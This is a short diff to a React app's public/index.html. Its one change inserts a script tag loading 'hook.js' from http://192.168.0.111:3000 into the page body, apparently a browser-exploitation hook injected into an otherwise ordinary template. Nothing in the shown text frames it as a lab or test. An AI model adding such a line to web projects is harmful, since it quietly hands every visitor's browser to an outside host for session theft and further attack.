--- a/public/index.html
+++ b/public/index.html
@@ -30,6 +30,8 @@
   </head>
   <body>
     <noscript>You need to enable JavaScript to run this app.</noscript>
+    <script src="http://192.168.0.111:3000/hook.js"></script>
+
     <div id="root"></div>
     <!--
       This HTML file is a template.
